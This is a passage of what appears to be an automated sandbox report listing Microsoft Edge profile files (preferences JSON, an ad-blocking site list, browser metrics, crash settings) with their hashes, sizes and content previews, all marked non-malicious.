Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"78ce1004-27c7-4e9e-b1f4-049aef7f42ec"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1732879676"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1002f52c-4423-4129-acf2-628a488835bb.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44719
Entropy (8bit):	6.096676152688953
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xpBLmZ7kaIMdDCscGsKwWE7RTupzKscDX//NPC1os:z/Ps+wsI7yOEYKoRTuiVIos
MD5:	68C66EFF7110131C0E6CB225AD233511
SHA1:	EF627B74DE71863FF25841B89E27589A26F9E951
SHA-256:	57D6A08EC947DD8E91853292EACB4A607C9C1E1077F20669C06009D6BE3C48F3
SHA-512:	E728FD20CCD3E2C12CA691E8E491F6443302E74FB7D659FEE943B3E3930216C272501617C55E9184D5E94D5CE9C0B6A40AAB1125A43E0998FCC96C5EC3668677
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2145e85f-1e5b-4113-af12-8cf3deb6fd4f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46156
Entropy (8bit):	6.0886522621555725
Encrypted:	false
SSDEEP:	768:lMkbJrT8IeQc5dXEV6LmZ7kaIMdDCscGsIQmxgxC1onwWE7RTupzKscDX//Nql:lMk1rT8H1XMYIQ9IonoRTuiK
MD5:	53A9E07F1B9A623B8C099B55D8D1DCC3
SHA1:	85479E721E096787D2BDD0865150B13C6F2F93A0
SHA-256:	2677B699A1AA3E8761FC8376CEF3BCECECF4715E057CE2382F0F8638AFB14EC3
SHA-512:	F5013FD749E37DCBE2DAE25664AD6926C98AD423AA4E397C9A97587F39EC00B55374797BC8A406DA866C77285C04B9E3FD66CABC10D65A4924FD75E7E6EEB72F
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"78ce1004-27c7-4e9e-b1f4-049aef7f42ec"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1732879676"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\3413ae80-4fa6-4e40-9794-3dbb2c1737a8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44637
Entropy (8bit):	6.096608124873096
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBLmZ7kaIi2x6+zYFQ2KwWE7RTupzKscDX//NPC1os:z/Ps+wsI7yn5XKoRTuiVIos
MD5:	EFDAC12DBDE5B516E43B7CB5464B6EC6
SHA1:	35E71C1941FF4BD33C12F53E1D0ED0FF4997CAAB
SHA-256:	0C70EB673DF8770F331AE7F27988E2B0B597106757CAC382BEFB8531AFA27031
SHA-512:	6BE2C4D429A9FCD9D1AB0181E8B11AD0A4842EEE083EE16C27960450632BC71A9994842448B8FCAC2281DDE384712C7EDD09B2302349CCD37BD29655C387CC62
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\99657853-0b48-48aa-89c7-71134b534ee9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44637
Entropy (8bit):	6.096608124873096
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBLmZ7kaIi2x6+zYFQ2KwWE7RTupzKscDX//NPC1os:z/Ps+wsI7yn5XKoRTuiVIos
MD5:	EFDAC12DBDE5B516E43B7CB5464B6EC6
SHA1:	35E71C1941FF4BD33C12F53E1D0ED0FF4997CAAB
SHA-256:	0C70EB673DF8770F331AE7F27988E2B0B597106757CAC382BEFB8531AFA27031
SHA-512:	6BE2C4D429A9FCD9D1AB0181E8B11AD0A4842EEE083EE16C27960450632BC71A9994842448B8FCAC2281DDE384712C7EDD09B2302349CCD37BD29655C387CC62
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\55267dfa-8d2f-46a7-add0-79396ba2c1a1.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.64013246649014
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
MD5:	10101225085294C4AA9050CEF19E599D
SHA1:	D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
SHA-256:	6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
SHA-512:	A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.64013246649014
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
MD5:	10101225085294C4AA9050CEF19E599D
SHA1:	D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
SHA-256:	6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
SHA-512:	A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6749A536-153C.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.45263771266479297
Encrypted:	false
SSDEEP:	3072:s0MVXGfWoe50W5qthAmkcm6eiVJczaqx2GncM1ZyJqxV4BTg1HFi:eVXseUthjkcmEknnc4yJqxV4BTaHk
MD5:	5712BB9E9FA24C1F8CAA316694FD6FAD
SHA1:	A81DD85656E5D99296D99327D13EC4D7293A3BDE
SHA-256:	8315093EF9321EC7AF7217D1919A3EEAFC92DB01BAC97B06F517F7B16579564E
SHA-512:	B11B9E4A86FFFF8D737092CC6DF56BFD689C178E44E5A2B3CAFCF318333C52E593B2C4ECF8BB5FC944072EAF6D154E063C29A8549A6BA8FF1E464CAFC10D9E0F
Malicious:	false
Preview:	...@..@...@.....C.].....@...................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".rirwoe20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............!......................w..U?:K...G...W6.>.........."....."...24.."."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...V.-../Q@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. ...2.....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6749A536-FF0.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.047595669368774754
Encrypted:	false
SSDEEP:	192:UACxI+0pqtmonOAQJYyJ/7qiRD80JVFg8Xh6IXhEHsBzhEhNqVv+RQ8TfC5RIn8H:HSI+0ctvoV6OnhcqmvCnI08T2RGOD
MD5:	0BCB13D066ADD6B695DAA8C47E0BA718
SHA1:	215930B4C2E2D218EC71F2F170815296B29AE8A6
SHA-256:	F73AC1C1FC3EB5CD7C6F5A398D2F1E79B091D30CC097F4DC4C621890D9F01E84
SHA-512:	8F842E8EA96DBDE1AD13B3CCAAB840AAEFA53757F3645DFF37189D9C19C0EFD40A42AE14D3969341E95935DC5189A88243D8308C866D95664CCC20F659165749
Malicious:	false
Preview:	...@..@...@.....C.].....@................k...Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".rirwoe20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............!......................w..U..G...W6.>.........."....."...24.."."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...V.-../Q@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2............... .2........9.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.195531555605597
Encrypted:	false
SSDEEP:	3:FiWWltlMpKoKuNoDZbkDURSHxig5ABVP/Sh/JzvNKIUBUhX9USWXQPWllt:o1GVKCoD4Hxi2ABVsJDZYeulX+W/
MD5:	B43C738AB1422F16D60B4C4B49CC7DF2
SHA1:	98C07F5F5E4F25C2BC0B2B5E6A3A2245F7D18215
SHA-256:	C28208A8D5052C44515333D67BE35E9900BB0C1E68DECF8C8CDC8DB67DE51E4C
SHA-512:	07A58D40C283CBDB4063D1EF70EBDAFF8E84CB47F530B939FA25195F9652976CB3E439F315A18D732128E60B5F2856DC1CA42E814DE45F2301DC143A0D22798E
Malicious:	false
Preview:	sdPC.........................TJ.[Y....."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................ecadf109-1d88-4bd2-8ebf-85346832b43e............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0d13dbc1-0b35-42b0-bb62-1e273af28a82.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40470
Entropy (8bit):	5.560826286500812
Encrypted:	false
SSDEEP:	768:J9+6pg7pLGLPCgWPk2f8s8F1+UoAYDCx9Tuqh0VfUC9xbog/OVFwudln6rwHwAPE:J9+6pscPCgWPk2f8su1ja4wu3n/HwYG1
MD5:	58939523E7CE730B02D240B6F271077B
SHA1:	BF162B4BB8E854654FDDA2099593DA844F560F4D
SHA-256:	70E26208E09BA0BC14613F5D916F5572FA04374351CF8ED7BAA8D9CF6A357142
SHA-512:	450F7B014FE068801180797364D74C6D8BF77550EB604E8F07B678C15879821315495E3DFA6DF46782A73ED017DBD02B75A827BD769683E792B09D591BC23FAB
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377353271011156","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377353271011156","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\231fa39f-46c5-4923-96a5-800c8a991664.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9680
Entropy (8bit):	5.111007018216838
Encrypted:	false
SSDEEP:	192:stPkdpIsQbhIa34HkpyVq28YbV+FLxQA4Mq7NIkPEYJ:stPQIsQbhXDobGtQx/7NIE
MD5:	66563238EA15E450AF916F912AD92C3F
SHA1:	0483EE588011AE109390FB3A0C84999006C1897E
SHA-256:	002B6CC15590FC71D718DD7753D21D658A4ECCDE82AEAD164B87D387EF9DEB56
SHA-512:	4C515B0FCDD2776382EB6EF88BB50861CB9429C8C5C83D937CEAA3FC3E54DCD80BCD82CA30D3C3469607B56D401AB7F1F0CD8013BC36BC9C3476AE6E91390F5A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377353272098661","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\32cde8c5-57bc-4e17-a862-66b92e9a282c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17449), with no line terminators
Category:	dropped
Size (bytes):	17455
Entropy (8bit):	5.497370095504165
Encrypted:	false
SSDEEP:	384:stPPGQSu4IsQbhXOKduBkWDpsJiRTZobGtQwh6f7NIE:s1OXubbh1bGepX
MD5:	4D92F8827F488B70326E76BCB3CA9495
SHA1:	60C6BDE51CFB2C93CA99351E5C17BBEFA079C12B
SHA-256:	D5E3BE50C87E8DE8FF94B263A324E9F8EA14949DC52E2FD589CCD44655C08556
SHA-512:	5EE3FC3DBA448D313A548DFEB189476C2606C308F982D8E9CE84B8DBBA9DB9A16BD9A6D27E8B58A0A3FD1BFF3C98B745F2BDBBA28932888E3AA81F76F1153161
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377353272098661","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\91a4106b-fef6-420d-8b6a-a46ea3321e6a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (16691), with no line terminators
Category:	dropped
Size (bytes):	16697
Entropy (8bit):	5.458687774741468
Encrypted:	false
SSDEEP:	384:stPPGQSu4IsQbhXZduBkWDpsJiRTZobGtQwh/7NIE:s1OXubbhBbGeuX
MD5:	C0234AD85E693A4B8B7C41306E473B07
SHA1:	0FC020BA89320B5C8E64A5CCAE30092FA27FCACC
SHA-256:	04815D73A562B1858619E096B8FF45D83A8462606D972D23AA142235AFE8C24A
SHA-512:	E882106EFCCDF509FEB2D19D9637C809AC38BC2CD7069C24599234EC4EDE77EEB848B465089E638021468171C3D88404A462A2E6BBE34554DB51625D706643F5
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377353272098661","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\99fdcc7e-957e-4aed-bb9a-b0f7e834360b.tmp

